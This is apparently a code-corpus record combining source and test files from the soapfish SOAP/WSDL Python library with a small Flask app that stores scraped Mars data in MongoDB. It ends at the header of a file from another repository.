logger.debug('Response Envelope: %s', r.content)
return self._handle_response(method, r.headers, r.content)
```
#### File: soapfish/soapfish/utils.py
```python
from __future__ import absolute_import
import hashlib
import itertools
import keyword
import logging
import os
import re
from datetime import datetime, timedelta
import requests
import six
from jinja2 import Environment, PackageLoader
from . import namespaces as ns
logger = logging.getLogger('soapfish')
# --- File Functions ----------------------------------------------------------
def resolve_location(path, cwd):
if '://' in path:
location = path
else:
path = os.path.join(cwd, path)
location = os.path.relpath(path, cwd)
cwd = os.path.dirname(path)
return path, cwd, location
def open_document(path):
if '://' in path:
logger.info('Opening remote document: %s', path)
return requests.get(path).content
else:
logger.info('Opening local document: %s', path)
with open(path, 'rb') as f:
return f.read()
# --- Template Filters --------------------------------------------------------
def remove_namespace(qname):
return qname.split(':')[-1] if qname else None
def uncapitalize(value):
if value == 'QName':
return value
return value[0].lower() + value[1:]
def schema_name(obj, location=None):
from . import xsdspec
if location:
value = location
elif isinstance(obj, xsdspec.Schema):
value = obj.targetNamespace
elif isinstance(obj, xsdspec.Import):
value = obj.namespace
elif isinstance(obj, xsdspec.Include):
value = obj.schemaLocation
else:
raise TypeError('Unable to generate schema name for %s.%s'
% (obj.__class__.__module__, obj.__class__.__name__))
try:
value = value.encode()
except UnicodeEncodeError:
pass
# no cryptographic requirement here, so use md5 for fast hash:
return hashlib.md5(value).hexdigest()[:5]
def schema_select(schemas, elements):
selected = None
elements = [remove_namespace(x) for x in elements]
for schema in schemas:
if all(schema.get_element_by_name(x) for x in elements):
selected = schema
break
return selected
def get_rendering_environment(xsd_namespaces, module='soapfish'):
'''
Returns a rendering environment to use with code generation templates.
'''
from . import soap, xsd, xsdspec, wsdl
def capitalize(value):
return value[0].upper() + value[1:]
def use(value):
from . import xsd
if value == xsd.Use.OPTIONAL:
return 'xsd.Use.OPTIONAL'
if value == xsd.Use.REQUIRED:
return 'xsd.Use.REQUIRED'
if value == xsd.Use.PROHIBITED:
return 'xsd.Use.PROHIBITED'
raise ValueError('Unknown value for use attribute: %s' % value)
def url_regex(url):
o = six.moves.urllib.parse.urlparse(url)
return r'^%s$' % re.escape(o.path.lstrip('/'))
def url_component(url, item):
parts = six.moves.urllib.parse.urlparse(url)
try:
return getattr(parts, item)
except AttributeError:
raise ValueError('Unknown URL component: %s' % item)
def url_template(url):
o = list(six.moves.urllib.parse.urlparse(url))
o[0:2] = ['${scheme}', '${host}']
return six.moves.urllib.parse.urlunparse(o)
def get_type(obj, known_types=None):
qname = None
if isinstance(obj, (xsdspec.Attribute, xsdspec.Element)):
if obj.ref:
qname = obj.ref
elif obj.type:
qname = obj.type
elif obj.simpleType:
# FIXME: Determine how to handle embedded types...
raise NotImplementedError('Unable to handle embedded type.')
elif isinstance(obj, (xsdspec.Extension, xsdspec.Restriction)):
if obj.base:
qname = obj.base
elif isinstance(obj, six.string_types):
qname = obj
if not qname:
raise ValueError('Unable to determine type of %s' % obj)
qname = qname.split(':')
if len(qname) < 2:
qname.insert(0, None)
ns, name = qname
name = capitalize(name)
if ns in xsd_namespaces:
return 'xsd.%s' % name
elif known_types is not None and name in known_types:
return '%s' % name
else:
return "__name__ + '.%s'" % name
# XXX: Python 2: Add extra values that should be considered keywords.
keywords = set(keyword.kwlist + ['False', 'None', 'True'])
env = Environment(
extensions=['jinja2.ext.do', 'jinja2.ext.loopcontrols'],
loader=PackageLoader('soapfish', 'templates'),
)
env.filters.update(
capitalize=capitalize,
fix_keyword=lambda x: '_%s' % str(x) if str(x) in keywords else str(x),
max_occurs=lambda x: 'xsd.UNBOUNDED' if x is xsd.UNBOUNDED else str(x),
remove_namespace=remove_namespace,
type=get_type,
url_component=url_component,
url_regex=url_regex,
url_template=url_template,
use=use,
)
env.globals.update(
SOAPTransport=soap.SOAP_HTTP_Transport,
keywords=keywords,
get_by_name=wsdl.get_by_name,
get_message_header=wsdl.get_message_header,
get_message_object=wsdl.get_message_object,
preamble={
'module': module,
'generated': datetime.now(),
},
schema_name=schema_name,
schema_select=schema_select,
)
return env
# --- Other Functions ---------------------------------------------------------
def find_xsd_namespaces(xml):
nsmap = xml.nsmap.copy()
for x in xml.xpath('//*[local-name()="schema"]'):
nsmap.update(x.nsmap)
return {k for k, v in six.iteritems(nsmap) if v in (ns.xsd, ns.xsd2000)}
def walk_schema_tree(schemas, callback, seen=None):
if seen is None:
seen = {}
for schema in schemas:
for item in itertools.chain(schema.imports, schema.includes):
if item.location not in seen:
seen[item.location] = callback(item)
walk_schema_tree([item], callback, seen)
return seen
def timezone_offset_to_string(offset):
'''
Returns a XSD-compatible string representation of a time zone UTC offset
(timedelta).
e.g. timedelta(hours=1, minutes=30) -> '+01:30'
'''
# Please note that this code never uses 'Z' for UTC but returns always the
# full offset (which is completely valid as far as the XSD spec goes).
# The main reason for that (besides slightly simpler code) is that checking
# for "UTC" is more complicated than one might suspect. A common failure is
# to check for a UTC offset of 0 and the absence of winter/summer time.
# However there are time zones (e.g. Africa/Ghana) which satisfy these
# criteria as well but are NOT UTC. In particular the local government may
# decide to introduce some kind of winter/summer time while UTC is
# guaranteed to have no such things.
sign = '+' if (offset >= timedelta(0)) else '-'
offset_seconds = abs((offset.days * 24 * 60 * 60) + offset.seconds)
hours = offset_seconds // 3600
minutes = (offset_seconds % 3600) // 60
return '%s%02d:%02d' % (sign, hours, minutes)
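# Small illustrative check of the offset formatting described above: positive,
# negative and zero offsets all render as a signed, zero-padded hh:mm string.
if __name__ == '__main__':
    assert timezone_offset_to_string(timedelta(hours=1, minutes=30)) == '+01:30'
    assert timezone_offset_to_string(timedelta(hours=-5)) == '-05:00'
    assert timezone_offset_to_string(timedelta(0)) == '+00:00'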
```
#### File: soapfish/soapfish/xsdspec.py
```python
from __future__ import absolute_import
import itertools
from . import namespaces as ns, xsd
XSD_NAMESPACE = ns.xsd
class Enumeration(xsd.ComplexType):
value = xsd.Attribute(xsd.String)
@classmethod
def create(cls, value):
enum = Enumeration()
enum.value = value
return enum
class Pattern(xsd.ComplexType):
NAMESPACE = ns.xsd
value = xsd.Attribute(xsd.String)
class RestrictionValue(xsd.ComplexType):
NAMESPACE = ns.xsd
value = xsd.Attribute(xsd.String)
def __repr__(self):
return 'RestrictionValue<%r>' % self.value
class Restriction(xsd.ComplexType):
NAMESPACE = ns.xsd
base = xsd.Attribute(xsd.String)
enumerations = xsd.ListElement(Enumeration, 'enumeration')
pattern = xsd.Element(Pattern)
minInclusive = xsd.Element(RestrictionValue)
minExclusive = xsd.Element(RestrictionValue)
maxExclusive = xsd.Element(RestrictionValue)
maxInclusive = xsd.Element(RestrictionValue)
fractionDigits = xsd.Element(RestrictionValue)
totalDigits = xsd.Element(RestrictionValue)
length = xsd.Element(RestrictionValue)
minLength = xsd.Element(RestrictionValue)
maxLength = xsd.Element(RestrictionValue)
whiteSpace = xsd.Element(RestrictionValue)
def to_python(self):
return '[%s]' % ', '.join("'%s'" % e.value for e in self.enumerations)
class List(xsd.ComplexType):
NAMESPACE = ns.xsd
pass
class SimpleType(xsd.ComplexType):
NAMESPACE = ns.xsd
name = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
restriction = xsd.Element(Restriction, minOccurs=0)
list = xsd.Element(List, minOccurs=0)
class Element(xsd.ComplexType):
NAMESPACE = ns.xsd
name = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
type = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
ref = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
minOccurs = xsd.Attribute(xsd.Integer, use=xsd.Use.OPTIONAL)
maxOccurs = xsd.Attribute(xsd.MaxOccurs, use=xsd.Use.OPTIONAL)
nillable = xsd.Attribute(xsd.Boolean, use=xsd.Use.OPTIONAL)
substitutionGroup = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL) # FIXME: Should use xsd.List(xsd.QName)?
simpleType = xsd.Element(SimpleType, minOccurs=0)
complexType = xsd.Element('soapfish.xsdspec.XSDComplexType')
class Sequence(xsd.ComplexType):
NAMESPACE = ns.xsd
elements = xsd.ListElement(Element, 'element')
class Attribute(xsd.ComplexType):
NAMESPACE = ns.xsd
name = xsd.Attribute(xsd.String)
ref = xsd.Attribute(xsd.String)
type = xsd.Attribute(xsd.String)
use = xsd.Attribute(xsd.String)
simpleType = xsd.Element(SimpleType, minOccurs=0)
class AttributeGroup(xsd.ComplexType):
NAMESPACE = ns.xsd
name = xsd.Attribute(xsd.String)
attributes = xsd.ListElement(Attribute, 'attribute')
class AttributeGroupReference(xsd.ComplexType):
NAMESPACE = ns.xsd
ref = xsd.Attribute(xsd.String)
def to_python(self):
typename = get_type(self.ref)
data = {'name': typename.lower(), 'type': typename}
return ''' %(name)s = xsd.Ref(%(type)s)\n''' % data
class Extension(xsd.ComplexType):
NAMESPACE = ns.xsd
base = xsd.Attribute(xsd.String)
sequence = xsd.Element(Sequence)
attributes = xsd.ListElement(Attribute, 'attribute')
attributeGroups = xsd.ListElement(AttributeGroupReference, 'attributeGroup')
class ComplexContent(xsd.ComplexType):
NAMESPACE = ns.xsd
mixed = xsd.Attribute(xsd.Boolean)
extension = xsd.Element(Extension)
restriction = xsd.Element(Extension)
class XSDComplexType(xsd.ComplexType):
NAMESPACE = ns.xsd
name = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
sequence = xsd.Element(Sequence)
choice = xsd.Element(Sequence)
all = xsd.Element(Sequence)
complexContent = xsd.Element(ComplexContent)
attributes = xsd.ListElement(Attribute, 'attribute')
attributeGroups = xsd.ListElement(AttributeGroupReference, 'attributeGroup')
class Group(xsd.ComplexType):
NAMESPACE = ns.xsd
name = xsd.Attribute(xsd.String)
sequence = xsd.Element(Sequence)
class Import(xsd.ComplexType):
schemaLocation = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
namespace = xsd.Attribute(xsd.String, use=xsd.Use.OPTIONAL)
class Include(xsd.ComplexType):
schemaLocation = xsd.Attribute(xsd.String)
class Schema(xsd.ComplexType):
NAMESPACE = ns.xsd
targetNamespace = xsd.Attribute(xsd.String)
elementFormDefault = xsd.Attribute(
xsd.String(enumeration=['qualified', 'unqualified']),
use=xsd.Use.OPTIONAL, default='unqualified',
)
imports = xsd.ListElement(Import, 'import')
includes = xsd.ListElement(Include, 'include')
simpleTypes = xsd.ListElement(SimpleType, 'simpleType')
groups = xsd.ListElement(Group, 'group')
attributeGroups = xsd.ListElement(AttributeGroup, 'attributeGroup')
complexTypes = xsd.ListElement(XSDComplexType, 'complexType')
elements = xsd.ListElement(Element, 'element')
def get_element_by_name(self, name):
# FIXME: Handle imported and included schemas.
for element in self.elements:
if name == element.name:
return element
else:
return None
SCHEMA = xsd.Schema(
targetNamespace=ns.xsd,
elementFormDefault=xsd.ElementFormDefault.QUALIFIED,
simpleTypes=[],
attributeGroups=[],
groups=[],
complexTypes=[Enumeration, Pattern, RestrictionValue, Restriction, List,
SimpleType, Element, Sequence, Attribute, AttributeGroup,
AttributeGroupReference, Extension, ComplexContent,
XSDComplexType, Group, Schema],
elements={},
)
```
#### File: tests/framework/django_test.py
```python
from __future__ import absolute_import
import unittest
from collections import namedtuple
from datetime import datetime
from soapfish.django_ import django_dispatcher
from soapfish.testutil import echo_service, framework
try:
import django
from django.conf import settings
except ImportError:
django = None
else:
settings.configure(
ALLOWED_HOSTS=['testserver'],
ROOT_URLCONF=None,
DEBUG=True,
DEBUG_PROPAGATE_EXCEPTIONS=True,
EMAIL_BACKEND='django.core.mail.backends.dummy.EmailBackend',
LOGGING_CONFIG=None,
USE_I18N=False,
USE_TZ=True,
)
from django.conf.urls import url
from django.test import Client
urlconf = namedtuple('urlconf', 'urlpatterns')
@unittest.skipIf(django is None, 'Django is not installed.')
class DjangoDispatchTest(framework.DispatchTestMixin, unittest.TestCase):
def setUp(self): # noqa
self.service = echo_service()
settings.ROOT_URLCONF = urlconf(urlpatterns=(url(r'^ws/$', django_dispatcher(self.service)),))
self.client = Client()
def _prepare_extras(self, headers):
extras = {'HTTP_' + k.replace('-', '_').upper(): v for k, v in headers.items()}
extras.update(content_type=headers['Content-Type'])
return extras
def test_can_retrieve_wsdl(self):
response = self.client.get('/ws/', {'wsdl': None})
self.assertEquals(200, response.status_code)
self.assertEquals('text/xml', response['Content-Type'])
self.assertIn(b'<wsdl:definitions', response.content)
def test_can_dispatch_simple_request(self):
input_value = str(datetime.now())
headers, body = self._soap_request(input_value)
extras = self._prepare_extras(headers)
response = self.client.post('/ws/', body, **extras)
self.assertEquals(200, response.status_code)
body = self._soap_response(response.content)
self.assertEquals(input_value, body.value)
```
#### File: tests/generation/code_test.py
```python
import os
import tempfile
import textwrap
import unittest
import six
from lxml import etree
from pythonic_testcase import (
assert_contains,
assert_equals,
assert_not_contains,
)
from soapfish import py2wsdl, utils, wsdl2py, xsd2py
class CodeGenerationTest(unittest.TestCase):
def _exec(self, code, globalz):
_, fn = tempfile.mkstemp(suffix='.py')
header = textwrap.dedent('''\
# -*- coding: utf-8 -*-
import sys
sys.path.append(r'{0}')
''').format(os.path.dirname(fn).rstrip('\\')).encode('utf8')
code = header + b'\n' + code + b'\n'
with open(fn, 'wb') as f:
f.write(code)
compile(code, fn, 'exec')
globalz['__name__'] = os.path.basename(fn).rsplit('.', 1)[0]
six.exec_(code, globalz)
def _check_reparse_wsdl(self, base, target):
tree = py2wsdl.generate_wsdl(base['PutOpsPort_SERVICE'])
xml = etree.tostring(tree, pretty_print=True)
code = wsdl2py.generate_code_from_wsdl(xml, target)
m = {}
self._exec(code, m)
# XXX too much autonaming magic
m['PutOpsPort_SERVICE'] = m.pop('PutOpsPortPort_SERVICE')
if target == 'client':
m['PutOpsPortServiceStub'] = m.pop('PutOpsPortPortServiceStub')
assert_equals(sorted(m), sorted(base))
def test_code_generation_from_xsd(self):
xml = utils.open_document('tests/assets/generation/default.xsd')
# Add mandatory imports to test the generated code
code = xsd2py.generate_code_from_xsd(xml)
self._exec(code, {})
def test_code_generation_from_wsdl_client(self):
xml = utils.open_document('tests/assets/generation/default.wsdl')
code = wsdl2py.generate_code_from_wsdl(xml, 'client')
m = {}
self._exec(code, m)
self._check_reparse_wsdl(m, 'client')
def test_code_generation_from_wsdl_server(self):
xml = utils.open_document('tests/assets/generation/default.wsdl')
code = wsdl2py.generate_code_from_wsdl(xml, 'server')
m = {}
self._exec(code, m)
self._check_reparse_wsdl(m, 'server')
def test_relative_paths(self):
path = 'tests/assets/relative/relative.wsdl'
xml = utils.open_document(path)
code = wsdl2py.generate_code_from_wsdl(xml, 'server', cwd=os.path.dirname(path))
if six.PY3:
code = code.decode()
assert_contains('Schema2_Element', code)
assert_contains('Schema3_Element', code)
assert_equals(1, code.count('Schema3_Element'))
def test_import_same_namespace(self):
path = 'tests/assets/same_namespace/same_namespace.wsdl'
xml = utils.open_document(path)
code = wsdl2py.generate_code_from_wsdl(xml, 'server', cwd=os.path.dirname(path))
if six.PY3:
code = code.decode()
assert_contains('Schema1_Element', code)
assert_contains('Schema2_Element', code)
def test_schema_xsd_include(self):
path = 'tests/assets/include/include.wsdl'
xml = utils.open_document(path)
code = wsdl2py.generate_code_from_wsdl(xml, 'server', cwd=os.path.dirname(path))
if six.PY3:
code = code.decode()
assert_contains('Schema1_Element', code)
def test_schema_xsd_restriction(self):
xml = utils.open_document('tests/assets/generation/restriction.xsd')
code = xsd2py.generate_code_from_xsd(xml)
if six.PY3:
code = code.decode()
assert_contains('RestrictedString', code)
assert_contains("pattern=r'[a-z]+'", code)
def test_create_method_list_param(self):
xml = utils.open_document('tests/assets/generation/list_param.xsd')
code = xsd2py.generate_code_from_xsd(xml)
if six.PY3:
code = code.decode()
assert_contains('def create(cls, Items):', code)
assert_contains('instance.Items = Items', code)
assert_not_contains('Itemss', code)
```
#### File: tests/generation/wsdl_code_test.py
```python
import os
import mock
import unittest
from pythonic_testcase import (
PythonicTestCase,
assert_equals,
assert_is_not_empty,
assert_isinstance,
assert_length,
)
from soapfish import utils, wsdl2py, xsd
from soapfish.testutil import generated_symbols
class WSDLCodeGenerationTest(PythonicTestCase):
def test_can_generate_code_for_simple_wsdl_import(self):
path = 'tests/assets/generation/import_simple.wsdl'
xml = utils.open_document(path)
code = wsdl2py.generate_code_from_wsdl(xml, 'client', cwd=os.path.dirname(path))
schemas, symbols = generated_symbols(code)
assert_is_not_empty(schemas)
def test_can_generate_code_for_nested_wsdl_import(self):
path = 'tests/assets/generation/import_nested.wsdl'
xml = utils.open_document(path)
code = wsdl2py.generate_code_from_wsdl(xml, 'client', cwd=os.path.dirname(path))
schemas, symbols = generated_symbols(code)
assert_is_not_empty(schemas)
def test_can_generate_code_for_looped_wsdl_import(self):
path = 'tests/assets/generation/import_looped.wsdl'
xml = utils.open_document(path)
code = wsdl2py.generate_code_from_wsdl(xml, 'client', cwd=os.path.dirname(path))
schemas, symbols = generated_symbols(code)
assert_is_not_empty(schemas)
def test_can_generate_code_for_two_schemas(self):
xml = utils.open_document('tests/assets/generation/multi_schema.wsdl')
code = wsdl2py.generate_code_from_wsdl(xml, 'client')
schemas, symbols = generated_symbols(code)
assert_is_not_empty(schemas)
assert_length(2, [s for s in symbols if s.startswith('Schema_')])
assert_equals(['A'], list(schemas[0].elements))
assert_equals(['B'], list(schemas[1].elements))
@unittest.skip('Cannot generate code for wsdl with type inheritance')
def test_can_generate_code_for_inheritance(self):
xml = utils.open_document('tests/assets/generation/inheritance.wsdl')
code = wsdl2py.generate_code_from_wsdl(xml, 'client')
schemas, symbols = generated_symbols(code)
assert_is_not_empty(schemas)
assert_length(4, symbols)
assert_equals(['B', 'A'], list(schemas[0].elements))
assert_isinstance(schemas[0].elements['B']._type, xsd.String)
assert_isinstance(schemas[0].elements['A']._type, schemas[0].elements['B']._type.__class__)
def test_can_generate_remote_tree(self):
def _mock(path):
if path == 'http://example.org/xsd/simple_element.xsd':
filename = 'tests/assets/generation/simple_element.xsd'
else:
self.fail('Unexpected remote path: %s' % path)
with open(filename, 'rb') as f:
return f.read()
xml = utils.open_document('tests/assets/generation/import_remote.wsdl')
with mock.patch('soapfish.xsd2py.open_document') as p:
p.side_effect = _mock
code = wsdl2py.generate_code_from_wsdl(
xml,
'client',
cwd='http://example.org/code/')
schemas, symbols = generated_symbols(code)
```
#### File: soapfish/tests/py2xsd_test.py
```python
from __future__ import absolute_import, unicode_literals
from lxml import etree
from pythonic_testcase import PythonicTestCase, assert_false, assert_true
from soapfish import xsd
from soapfish.py2xsd import generate_xsd
class py2xsdTest(PythonicTestCase):
def test_can_generate_schema_xml_containing_types_with_pattern_restriction(self):
ns = 'http://soap.example/pattern.xsd'
class Container(xsd.ComplexType):
code = xsd.Element(xsd.String(pattern='[0-9]{0,5}'))
schema = xsd.Schema(ns,
location=ns,
elementFormDefault=xsd.ElementFormDefault.QUALIFIED,
complexTypes=(
Container,
),
elements={
'foo': xsd.Element(Container),
},
)
# previously this would fail
xsd_element = generate_xsd(schema)
xmlschema = etree.XMLSchema(xsd_element)
valid_xml = '<foo xmlns="%s"><code>1234</code></foo>' % ns
def is_valid(s):
return xmlschema.validate(etree.fromstring(s))
assert_true(is_valid(valid_xml))
bad_xml = '<foo xmlns="%s"><code>abc</code></foo>' % ns
assert_false(is_valid(bad_xml))
```
#### File: soapfish/tests/soap11_test.py
```python
from __future__ import absolute_import
from lxml import etree
from pythonic_testcase import PythonicTestCase, assert_contains
from soapfish.soap11 import Code, get_error_response
class SOAP11Test(PythonicTestCase):
def test_get_error_response(self):
response = get_error_response(Code.SERVER, u'some error', actor='me')
xml = self._xml_strip(response)
assert_contains(b'<faultcode>Server</faultcode>', xml)
assert_contains(b'<faultactor>me</faultactor>', xml)
def _xml_strip(self, xml):
parser = etree.XMLParser(remove_blank_text=True)
return etree.tostring(etree.fromstring(xml, parser=parser))
```
#### File: tests/xsd/schema_test.py
```python
from pythonic_testcase import PythonicTestCase, assert_equals, assert_none
from soapfish import xsd
class SchemaTest(PythonicTestCase):
def test_can_lookup_element_by_name(self):
ns = 'http://soap.example/schema.xsd'
class CodeType(xsd.String):
pattern = r'[0-9]{5}'
schema = xsd.Schema(ns,
location=ns,
elementFormDefault=xsd.ElementFormDefault.QUALIFIED,
simpleTypes=[CodeType],
elements={'code': xsd.Element(CodeType)}
)
schema_element = schema.get_element_by_name('code')
assert_equals(CodeType, schema_element._passed_type)
assert_none(schema.get_element_by_name('invalid'))
``` |
{
"source": "JocCordova/XAIplayground",
"score": 3
} |
#### File: XAIplayground/pipeline/Main.py
```python
import os
import numpy as np
from sys import platform, path
if platform == "linux" or platform == "linux2":
path.insert(1, os.path.dirname(os.getcwd()) + "/src")
FILE_NAME = os.path.dirname(os.getcwd()) + "/data" + "/xAPI-Edu-Data-Edited.csv"
elif platform == "win32":
path.insert(1, os.path.dirname(os.getcwd()) + "\\src")
FILE_NAME = os.path.dirname(os.getcwd()) + "\\data" + "\\xAPI-Edu-Data-Edited.csv"
elif platform == "darwin":
path.insert(1, os.path.dirname(os.getcwd()) + "/src")
FILE_NAME = os.path.dirname(os.getcwd()) + "/data" + "/xAPI-Edu-Data-Edited.csv"
from DataPreprocessing import Preprocess, FeaturePreprocess
from DataProcessing import ModelTuning, ModelValidating, save_file, load_file
CATEGORICAL_COLUMNS = ["Gender", "Nationality", "PlaceofBirth", "StageID", "GradeID", "SectionID", "Topic",
"Semester", "Relation", "ParentAnsweringSurvey", "ParentSchoolSatisfaction",
"StudentAbsenceDays"]
PREFIXES = ["Gender", "Nationality", "PlaceofBirth", "Stage", "Grade", "Section", "Topic",
"Semester", "Relation", "Survey", "ParentSatisfaction",
"Absence"]
REMOVE_VALUES = ["G-05", "G-09"]
def preprocess_data(count_missing=False, replace_values=True, remove_values=False, encode=True,
categorical_columns=CATEGORICAL_COLUMNS,
prefixes=PREFIXES):
"""Preprocesses the raw dataset
Parameters
----------
count_missing : bool, default=False
Counts all missing values in the dataset
replace_values : bool, default=True
Replaces non significative values in the columns "Nationality" and "PlaceofBirth" with "Other"
remove_values : bool, default=False
Replaces rows with non significative values in the columns "GradeID"
encode : bool, default=True
One Hot encodes categorical columns
    categorical_columns : list of str, default=CATEGORICAL_COLUMNS
        Columns to apply one hot encoding to
    prefixes : list of str, default=PREFIXES
        Prefixes for one hot encoding
Returns
----------
X_data : pandas df
feature columns
y_data : pandas df
target columns
y_labels : {ndarray, sparse matrix}
        class labels (only returned when encode=True)
"""
preprocess = Preprocess(data=FILE_NAME)
if count_missing:
print(f"Number of rows missing values: {preprocess.check_missing_values()}")
if replace_values:
preprocess.replace_values("Nationality",
["Lybia", "Iraq", "Lebanon", "Tunisia", "SaudiArabia", "Egypt", "USA", "Venezuela",
"Iran", "Morocco", "Syria", "Palestine"], "Other")
preprocess.replace_values("PlaceofBirth",
["Lybia", "Iraq", "Lebanon", "Tunisia", "SaudiArabia", "Egypt", "USA", "Venezuela",
"Iran", "Morocco", "Syria", "Palestine"], "Other")
if remove_values:
preprocess.remove_values("GradeID", REMOVE_VALUES)
if encode:
preprocess.target_encode()
preprocess.one_hot_encode(columns=categorical_columns, prefix=prefixes)
X_data, y_data = preprocess.get_data()
y_labels = preprocess.target_decode()
return X_data, y_data, y_labels
X_data, y_data = preprocess.get_data()
return X_data, y_data
def preprocess_features(X_data, scaler_type="standard", n_components=None, plot_pca=False, threshold=0.85,
savefig=True):
"""
processes feature columns with a scaler and pca
Parameters
----------
X_data : pandas df
feature Columns
    scaler_type : str, default="standard"
        scaler to use ('standard'/'min_max')
    n_components : int, default=None
        pca components to use, if 'None' uses all components
    plot_pca : bool, default=False
        specifies if pca should be plotted
threshold : float range(0,1), default=0.85
pca variance threshold to plot vertical line at
savefig : bool, default=True
specifies if pca plot should be saved
Returns
----------
X_transformed : ndarray
preprocessed feature columns
feature_preprocess : feature_preprocess object
feature_preprocess object used (for the pipeline)
"""
if n_components is None:
n_components = len(X_data.columns)
feature_preprocess = FeaturePreprocess(X_data, n_components=n_components, scaler_type=scaler_type)
X_transformed = feature_preprocess.transform_data()
if plot_pca:
feature_preprocess.plot_pca(threshold=threshold, savefig=savefig)
return X_transformed, feature_preprocess
def create_estimators(X_data, y_data, train_size=0.7, hyperparam_tune=True, boosting=True, random_state=42,
verbose=1):
"""Splits the data in train, test and val, trains three different estimators: Decision Tree, Support Vector Machine
and Random Forest, can also tune the hyper parameters and boost the estimators with Adaboost
Parameters
----------
X_data : pandas df
feature Columns
y_data : pandas df
target column
train_size : float
        Fraction of the data to use for training
hyperparam_tune : bool, default=True
specifies if hyper params should be tuned
boosting : bool, default=True
specifies if estimators should be boosted
random_state : int, default=42
random state
verbose : int, default=1
verbosity level
Returns
----------
estimators : list of estimators
trained estimators
mt : ModelTuning object
ModelTuning object used (for validation set)
"""
estimators = []
mt = ModelTuning(X_data, y_data, train_size, random_state=random_state)
if verbose > 0:
print("Creating Basic Estimators...\n")
dt = mt.create_weak_learner(random_state, verbose, model_type="dt", )
svm = mt.create_weak_learner(random_state, verbose, model_type="svm")
rf = mt.create_random_forest(random_state, verbose)
estimators.extend([dt, svm, rf])
if hyperparam_tune:
if verbose > 0:
            print("Tuning Hyperparams...\n")
tuned_dt = mt.tune_hyperparam(dt, random_state, verbose)
tuned_svm = mt.tune_hyperparam(svm, random_state, verbose)
tuned_rf = mt.tune_hyperparam(rf, random_state, verbose)
estimators.extend([tuned_dt, tuned_svm, tuned_rf])
if boosting:
if verbose > 0:
print("Boosting...\n")
print("Boosted dt:")
boosted_dt = mt.boost_weak_learners(tuned_dt, random_state, verbose)
if verbose > 0:
print("Boosted svm:")
boosted_svm = mt.boost_weak_learners(tuned_svm, random_state, verbose)
if verbose > 0:
print("Boosted rf:")
boosted_rf = mt.boost_weak_learners(tuned_rf, random_state, verbose)
estimators.extend([boosted_dt, boosted_svm, boosted_rf])
return estimators, mt
def get_x_y_set(mt, type="test"):
"""Gets data set from ModelTuning object
Parameters
----------
mt : ModelTuning object
ModelTuning object used
type : str, default="test"
specifies which set to return ('train'/'test'/'val')
Returns
----------
X_data, y_data : ndarray
"""
if type == "val":
return mt.get_validation_set()
if type == "train":
return mt.get_train_set()
if type == "test":
return mt.get_test_set()
def validate_estimators(estimators, X_val, y_val, y_labels, scaler_type="", plot_cf=True, clas_report=True,
savefig=True):
"""Validates estimators
Parameters
----------
estimators : list of estimators
estimators to validate
X_val : ndarray
validation data
y_val : ndarray
validation labels
y_labels : {ndarray, sparse matrix}
decoded labels
scaler_type : str, optional
scaler used ('standard'/'min_max') (for plots)
plot_cf : bool, default=True
specifies if confusion matrix should be plot
clas_report : bool, default=True
specifies if Classification Report should be printed
savefig : bool, default=True
specifies if confusion matrix should be saved as .png
"""
for est in estimators:
mv = ModelValidating(est, X_val, y_val, y_labels=y_labels, scaler=scaler_type)
if plot_cf:
mv.plot_confusion_matrix(savefig=savefig)
if clas_report:
report = mv.classification_report()
print(f"Classification Report: {est}\n{report}")
def get_n_best(estimators, X_val, y_val, y_labels, best_n=3, score="f1_score"):
"""Gets best estimators from list
Parameters
----------
estimators : list of estimators
list of trained estimators
X_val : ndarray
validation data
y_val : ndarray
validation labels
y_labels : {ndarray, sparse matrix}
decoded labels
best_n : int, default=3
number of estimators to pick
score : str, default="f1_score"
metric to use for picking best estimators ('accuracy'/'f1_score')
Returns
----------
    best_est : list of estimators of length best_n
"""
best_scores = []
for est in estimators:
mv = ModelValidating(est, X_val, y_val, y_labels=y_labels, scaler="")
indv_scores = mv.get_scores()
if score == "accuracy":
best_scores.append(indv_scores[0])
if score == "f1_score":
best_scores.append(indv_scores[1])
best_idx = np.argpartition(best_scores, -best_n)[-best_n:]
best_est = []
for index in best_idx:
best_est.append(estimators[index])
return best_est
def save(models, file_name=None, suffix=None):
"""Saves estimator
Parameters
----------
file_name : str, optional
        name for the file; if None, each model is saved using the suffix
suffix : str, optional
suffix to be added
"""
if file_name is None:
for model in models:
save_file(model, suffix=suffix)
else:
save_file(models, file_name=file_name)
def load(model_name):
"""Loads and returns pickle File
"""
return load_file(model_name)
``` |
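The helpers in Main.py chain into a small train/validate/persist pipeline. The sketch below shows one way to wire them together using only the functions and defaults defined above; the import line assumes it runs next to Main.py, and the `suffix` value is an arbitrary example:
```python
# Hedged sketch: chaining the Main.py helpers end to end (assumes it runs alongside Main.py).
from Main import (preprocess_data, preprocess_features, create_estimators,
                  get_x_y_set, validate_estimators, get_n_best, save)
# Encode the raw dataset, then scale and PCA-transform the feature columns.
X_data, y_data, y_labels = preprocess_data()
X_transformed, feature_preprocess = preprocess_features(X_data, scaler_type="standard", plot_pca=False)
# Train the weak learners plus their tuned and boosted variants.
estimators, mt = create_estimators(X_transformed, y_data, train_size=0.7, verbose=1)
# Evaluate on the validation split and keep the three best models by F1 score.
X_val, y_val = get_x_y_set(mt, type="val")
validate_estimators(estimators, X_val, y_val, y_labels, scaler_type="standard", savefig=False)
best_models = get_n_best(estimators, X_val, y_val, y_labels, best_n=3, score="f1_score")
save(best_models, suffix="best")  # 'best' is an example suffix passed through to save_file
```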
{
"source": "jocelflores/web-scraping-challenge",
"score": 3
} |
#### File: Missions_to_Mars/.ipynb_checkpoints/app-checkpoint.py
```python
from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import mars_scrape
# create flask and establish Mongo Connection
app = Flask(__name__)
mongo = PyMongo(app, uri="mongodb://localhost:27017/mars_app")
# create route to render index.html
@app.route("/")
def home():
# find dictionary and return
html_table = mongo.db.collection.find_one()
    return render_template('index.html', mars=html_table)
@app.route("/scrape")
def scrape():
#run scrape function
mars_info = mars_scrape.scrape()
# update db
mongo.db.collection.update({}, mars_info, upsert=True)
return redirect("/")
if __name__ == "__main__":
app.run(debug=True)
``` |
{
"source": "JocelineLega/covid19-forecast-hub",
"score": 3
} |
#### File: code/validation/test-formatting.py
```python
